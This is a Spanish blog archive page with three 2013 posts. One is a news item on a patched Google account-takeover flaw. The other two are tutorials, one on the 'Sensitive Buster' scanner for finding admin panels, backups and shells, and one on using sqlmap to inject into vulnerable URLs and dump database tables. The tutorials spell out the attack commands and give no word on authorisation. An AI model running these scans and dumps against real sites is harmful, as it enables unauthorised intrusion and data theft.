Anuncios

Mostrando las entradas con la etiqueta vulnerabilidades. Mostrar todas las entradas
Mostrando las entradas con la etiqueta vulnerabilidades. Mostrar todas las entradas

miércoles, 27 de noviembre de 2013

Hackean Google Mail y Obtienen $ 5 100 dolares


Oren Hafif, un investigador de seguridad ha descubierto una vulnerabilidad crítica en el proceso de restablecimiento de la contraseña de la cuenta de Google que permite a un atacante secuestrar cualquier cuenta.

Se las arregló para engañar a los usuarios de Google para que entreguen sus contraseñas a través de un ataque de phishing de lanza sencilla mediante el aprovechamiento de una serie de fallos, es decir, Cross-site request forgery (CSRF), y cross-site scripting (XSS), y un desvío de flujo.

En una prueba de concepto demostración en video, el atacante envía a su víctima una falsa "Confirmar propiedad de la cuenta" de correo electrónico, que dice provenir de Google.

La mención de enlace en el correo indica al destinatario para confirmar la titularidad de la cuenta e instó usuario cambiar su contraseña.
El enlace desde el correo electrónico aparentemente apunta a una URL HTTPS google.com, pero en realidad lleva a la víctima a la página web del atacante debido a un ataque CSRF con una dirección de correo electrónico personalizado.

La página de Google HTTPS se pedirá a la víctima para confirmar la propiedad mediante la introducción de su última contraseña y luego le pedirá para restablecer tu contraseña.
Pero en realidad el hacker ha robado la contraseña y el correo.

Hafif informó a los ingenieros de Google Security con los detalles de esta vulnerabilidad de seguridad seria y Google ahora se ha ocupado de las cuestiones de parcheo. Google ha premiado el Sr. Hafif con 5.100 dólares bajo su Programa de Recompensas por Bug.

lunes, 11 de noviembre de 2013

[Tutorial] Sensitive Buster: Escanear un sitio web para encontrar (Admin panel, backups, archivos y directorios)

Hola :3
Navegando en el internet me encontré con esta herramienta y quise compartirla contigo,

Información
Lo que caracteriza a esta herramienta es escanear determinado Sitio Web y encontrar desde paneles de administración hasta backups del sitio, esta desarrollado en el lenguaje Python así que puedes usar tanto Windows, como Linux o incluso Mac, yo usaré ubuntu 13.10 pero tu puedes usar el sistema operativo que prefieras.
Dicha herramienta lleva por nombre "Sensitive Buster", la herramienta es de código abierto por lo que puedes editarlo para adaptarlo a tus necesidades.

¿Cómo Usarlo?
Sensitive Buster es de lo más sencillo de manejar, se divide en 5 módulos (admin, backup, dir, files, shell), empecemos.

Paso 1
Descargar Sensitive Buster y descomprimirlo

Paso 2
Abrir una nueva terminal y dirigirnos al directorio donde se descomprimió, en mi caso lo descomprimí en:
windows:
cd C:/Sensitive_Buster/
linux:
cd Documentos/Sensitive_Buster

Paso 3
La sintaxis del comando es python sensitivebuster.py "<VICTIMA>" -m <MODULO>, de esta manera.
Mi objetivo sera hacia mi misma PC
~# python sensitivebuster.py "http://localhost/" -m shell
Comenzará a escanear la web y arrojará algo parecido a esto:
Cuando termine el proceso se guardaran los resultados en un archivo similar a http:localhost.txt en la carpeta raíz.

Paso 4
Así cuando finalmente termine podrás iniciar búsqueda con otros de los módulos ya mencionados, ¡Y eso es todo!
Espero le puedas dar un uso con provecho, repito "El conocimiento es libre".


Descarga de los materiales
Sensitive Buster (Descargar)
Ubuntu [Linux] (Descargar)
Python [No es necesario descargarlo en linux] (Descargar)

miércoles, 23 de octubre de 2013

Tutorial de SQL Injection con Sqlmap (En español)


En el siguiente tutorial aprenderemos como utilizar sqlmap para explotar la vulnerabilidad de un sitio web. Aquí la web del autor, se agradecen infinitamente las donaciones.
Yo usaré Ubuntu 13.10 para este tutorial.


Materiales
Sqlmap
Linux (sqlmap.tar.gz)
Windows (sqlmap.zip)

Python
Descargar


Ubuntu (SO)
Descargar
Instalar
Windows
  1.- Instalar Python
  2.- Abrir el archivo y descomprimirlo en C:/sqlmap/
Linux (terminal)
  1.- Abrir una nueva terminal y dirigirnos a la carpeta donde descomprimiremos sqlmap, yo lo haré en "/var/opt/"
    cd /var/opt
  2.- Descomprimir el archivo, yo lo descargué en "~/Documentos/", nos pedira la contraseña y comenzará a descomprimir
    sudo tar -xzvf ~/Documentos/sqlmap.tar.gz

  ¡Finalmente Sqlmap Se instaló!


Encontrando la Vulnerabilidad
Primero necesitamos una url vulnerable, en su mayoría se parecen a esta "index.php?id=65se puede comprobar añadiendo una comilla simple que provoca un error parecido a este:
Una vez encontrada la vulnerabilidad tenemos que comprobar que es vulnerable:
linux:
  sudo -sH (Importante ejecutar los comandos como root o Super User)
  cd /var/opt/sqlmap
  ./sqlmap.py
Windows:
 cd C:/sqlmap/
 python sqlmap.py

Ejecutamos el comando para listar las bases de datos:
  ./sqlmap.py -u "URL VULNERABLE" --dbs

Si todo sale bien nos mostrará un mensaje como este, diciendo que el parámetro es vulnerable y nos pregunta si queremos seguir testeando otros:
Elegimos que no oprimiendo la tecla "N".

Explotando la vulnerabilidad
Una vez encontrada la vulnerabilidad el programa nos mostrará las bases de datos de el sitio, tales como las siguientes:
Tenemos las siguientes bases de datos:
  available databases [2]:                                                           [*] dbkenwright
    [*] information_schema
¡Hemos entrado a las bases de datos del sistema!


Comandos
Les dejaré los comandos de lo que podemos hacer, de igual manera se pueden consultar con:
./sqlmap.py --help

Comprueba si el parametro es vulnerable y lista las bases de datos del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" --dbs
Lista las tablas del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> --tables 
Muestra el contenido de las tablas
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> -T <table> --dump